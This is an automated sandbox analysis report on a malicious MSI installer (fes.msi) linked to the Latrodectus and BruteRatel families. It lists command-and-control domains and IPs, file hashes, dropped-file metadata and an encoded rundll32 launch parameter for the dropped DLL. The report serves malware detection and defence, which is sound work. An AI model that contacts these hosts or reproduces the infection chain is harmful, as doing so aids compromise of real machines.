                                                                                                                              https://www.thawte.com/repository0Wfes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drfalse
                                                                                                                                high
                                                                                                                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://dogirafer.com/test/0explorer.exe, 00000009.00000002.4148681254.0000000009BFE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://api.msn.com/explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://dogirafer.com/3pexplorer.exe, 00000009.00000003.3468545748.000000000CB32000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            104.21.68.89
                                                                                                                                            dogirafer.comUnited States
                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                            103.57.249.207
                                                                                                                                            huanvn.comIndia
                                                                                                                                            17747SITINETWORS-IN-APSITINETWORKSLIMITEDINtrue
                                                                                                                                            94.232.43.224
                                                                                                                                            vutarf.comRussian Federation
                                                                                                                                            44477WELLWEBNLtrue
                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1567646
                                                                                                                                            Start date and time:2024-12-03 17:42:08 +01:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 10m 38s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Number of analysed new started processes analysed:46
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:fes.msi
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.spre.bank.troj.spyw.evad.winMSI@69/31@7/3
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                            • Number of executed functions: 70
                                                                                                                                            • Number of non-executed functions: 332
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .msi
                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            • VT rate limit hit for: fes.msi
                                                                                                                                            TimeTypeDescription
                                                                                                                                            11:43:33API Interceptor12592318x Sleep call for process: explorer.exe modified
                                                                                                                                            11:45:30API Interceptor2x Sleep call for process: WMIC.exe modified
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            104.21.68.89wait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                              zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                103.57.249.207wait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                  zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                    94.232.43.224wait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                      cTgZnuQlDo.exeGet hashmaliciousSystemBCBrowse
                                                                                                                                                        cTgZnuQlDo.exeGet hashmaliciousSystemBCBrowse
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          vutarf.comwait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 94.232.43.224
                                                                                                                                                          huanvn.comwait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 103.57.249.207
                                                                                                                                                          zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 103.57.249.207
                                                                                                                                                          bg.microsoft.map.fastly.netPvsaLvk7xD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • 199.232.210.172
                                                                                                                                                          Belegdetails Nr378-938-027181-PDF.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                          • 199.232.210.172
                                                                                                                                                          4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 199.232.214.172
                                                                                                                                                          K1_Chit_Form.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          • 199.232.210.172
                                                                                                                                                          y0FrwmkdQU.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                          • 199.232.214.172
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 199.232.210.172
                                                                                                                                                          MOaSkQR8WU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 199.232.210.172
                                                                                                                                                          VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                          • 199.232.214.172
                                                                                                                                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 199.232.214.172
                                                                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 199.232.214.172
                                                                                                                                                          dogirafer.comwait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          SITINETWORS-IN-APSITINETWORKSLIMITEDINwait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 103.57.249.207
                                                                                                                                                          zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 103.57.249.207
                                                                                                                                                          loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 202.142.118.100
                                                                                                                                                          na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                          • 103.225.178.92
                                                                                                                                                          msas.msiGet hashmaliciousORPCBackdoorBrowse
                                                                                                                                                          • 103.57.249.42
                                                                                                                                                          msas.msiGet hashmaliciousORPCBackdoorBrowse
                                                                                                                                                          • 103.57.249.42
                                                                                                                                                          sstn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 103.57.250.204
                                                                                                                                                          sstn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 103.57.250.204
                                                                                                                                                          VKkfiTAZXP.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                          • 103.225.178.98
                                                                                                                                                          YnO77q8WhV.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 45.117.200.73
                                                                                                                                                          WELLWEBNLwait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 94.232.43.224
                                                                                                                                                          sqx.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 94.232.40.38
                                                                                                                                                          merd.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 94.232.40.38
                                                                                                                                                          sqx.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 94.232.40.38
                                                                                                                                                          mesh.exeGet hashmaliciousMeshAgentBrowse
                                                                                                                                                          • 94.232.43.185
                                                                                                                                                          mesh.exeGet hashmaliciousMeshAgentBrowse
                                                                                                                                                          • 94.232.43.185
                                                                                                                                                          Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                                          • 94.232.43.213
                                                                                                                                                          81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                          • 94.232.45.36
                                                                                                                                                          JeZHGKJvrB.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 94.232.44.144
                                                                                                                                                          hFoVk4DJXG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 94.232.44.144
                                                                                                                                                          CLOUDFLARENETUS#Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                                                                                                          • 172.67.198.207
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 104.21.16.9
                                                                                                                                                          Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.146.191
                                                                                                                                                          hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                          • 172.65.251.78
                                                                                                                                                          Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.146.191
                                                                                                                                                          3GloGaDtsG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          • 188.114.97.6
                                                                                                                                                          #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                                                                                                          • 104.21.13.77
                                                                                                                                                          http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.16.123.96
                                                                                                                                                          File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                                                                                          • 104.26.13.205
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 172.67.165.166
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          MOaSkQR8WU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          Ksl3V3pqZq.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.68.89
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\Windows\Installer\MSI15E9.tmpzdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                            merd.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                              medk.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                lavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                  Document-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                                                    Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                      FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                        Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                                                          Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                                                            Document-14-33-26.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1206
                                                                                                                                                                              Entropy (8bit):5.700895426842802
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JOgmr3AyyU6nsOFGNRpULlgIgaFPz9JyeDhiSWr1JIgulgIg+LK:8hr3jansOFGNbUPeeD8SI
                                                                                                                                                                              MD5:D7F96145E406BA9B9DF5904AA205B7E1
                                                                                                                                                                              SHA1:94387D226F030D46621EFA281650AC26047A85E0
                                                                                                                                                                              SHA-256:027AEE66726590D6465DF582C70A96B9B2F0621356E1B3BFE908DD97DC0466EB
                                                                                                                                                                              SHA-512:273BBAE049431629F26DF3641429193407691C73C6B80FBD720371E8A8794DAC13C95EA50401A57766B9BD85D1D366F482CFEC950D86F09825D3E4BFECCD9D35
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...@IXOS.@.....@a].Y.@.....@.....@.....@.....@.....@......&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}..Globalcheck..fes.msi.@.....@#....@.....@........&.{C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}.....@.....@.....@.....@.......@.....@.....@.......@......Globalcheck......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}.@......&.{602B36A8-BB6A-4A36-906F-F62140AE53DB}&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}.@........CreateFolders..Creating folders..Folder: [1]#.;.C:\Users\user\AppData\Roaming\Globalcheck LLC\Globalcheck\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]....C:\Users\user\AppData\Roaming\....).C:\Users\user\AppData\Roaming\avutil.dll....WriteRegistryValues..Writing system registry values..Key:
                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                              Entropy (8bit):2.5793180405395284
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1752140
                                                                                                                                                                              Entropy (8bit):7.305582889398964
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:zbE5t+4+x4D5Z+KFNTsnkN6MFBUp6xdRWxgnsOmYX82Or0t:zbEfH+xIDhNTYCBUURWxgd72e
                                                                                                                                                                              MD5:2334A6AEDE2AD2A9004ECD96C872A910
                                                                                                                                                                              SHA1:45F7683952A599A607BA6B9B02DACC1586135F22
                                                                                                                                                                              SHA-256:C3BAF0446831B6968A30EA23647AC559EE62219F91DAAE5C1B0A9787F9C860B9
                                                                                                                                                                              SHA-512:EA6D669F474EA9281B00CF61A436FF59627F0EF19C9C0DF93C641DB0476CA9FEB0763A747E56B5C79B65287CB60628FB60C9E72BD2003BD0B5C270EA11C4FF51
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...A..f..........& ...)....L.......0........................................P......C.8...`... ..........................................E...@..........d....@...@........... ......0....................... ...(....................F...............................text...(...........................`..`.data...............................@....rdata...g.......h..................@..@.pdata...@...@...B... ..............@..@.xdata...O.......P...b..............@..@.bss.....................................edata...E.......F..................@..@.idata.......@......................@....CRT....`....`......................@....tls.........p......................@....rsrc...d...........................@..@.reloc....... ......................@..B.debug.......@..L...................@.../19..................J..............@..B/31.....6)...` ..*..................@..B/45.....
                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):100
                                                                                                                                                                              Entropy (8bit):5.189624409749109
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:BcBqWpNCwlzdRVgjaUyJoy+IYa1LQKwtC1Y:BopNCwpJg2rmfE1owS
                                                                                                                                                                              MD5:DA6329B4C63865BB82B745020F73D674
                                                                                                                                                                              SHA1:D4E36F1B054D498DC9F489C1462636BE229B472B
                                                                                                                                                                              SHA-256:3F10A4EB33DEB90C031800542856E369ADCF94FD36A8A1DB8611FF058DD5C46A
                                                                                                                                                                              SHA-512:03D8CAA4629D9D72650E38057E9C91262F17916A6A3828BE74CE9FE54B04F62160E612C5BE40E8A7DE7569ECD937483ED5D43430751A81A9094FAC46B8762052
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{YXZ1dGlsLmRsbA==, IkM6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ1xhdnV0aWwuZGxsIg==, MQ==, RExMTWFpbg==}
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}, Number of Words: 10, Subject: Globalcheck, Author: Globalcheck LLC, Name of Creating Application: Globalcheck, Template: ;1033, Comments: Database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2200576
                                                                                                                                                                              Entropy (8bit):7.4656553416380085
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:pXE3YQW8zBQSc0ZnSKBZKumZr7AaIGQ5rr0Go:UYH0Zn3K/AafII
                                                                                                                                                                              MD5:371FE9184F46204250BCB30FE62F3A08
                                                                                                                                                                              SHA1:490453E5EEAAF89071A29C68548314D1E9B21592
                                                                                                                                                                              SHA-256:658B8C47D7193C7C31A2540B2F54FCDFB9298D8346A4AD3BE7E684EF946F57A5
                                                                                                                                                                              SHA-512:F06E18A495C8DF1A48DEF116711E7F1452E520BA49585971BDC54D9D6C0E441DE2A490544EDF7E34FD9453C4DE5E67F0E11F0EE45479906B138E6C658DDAC199
                                                                                                                                                                              Malicious:false
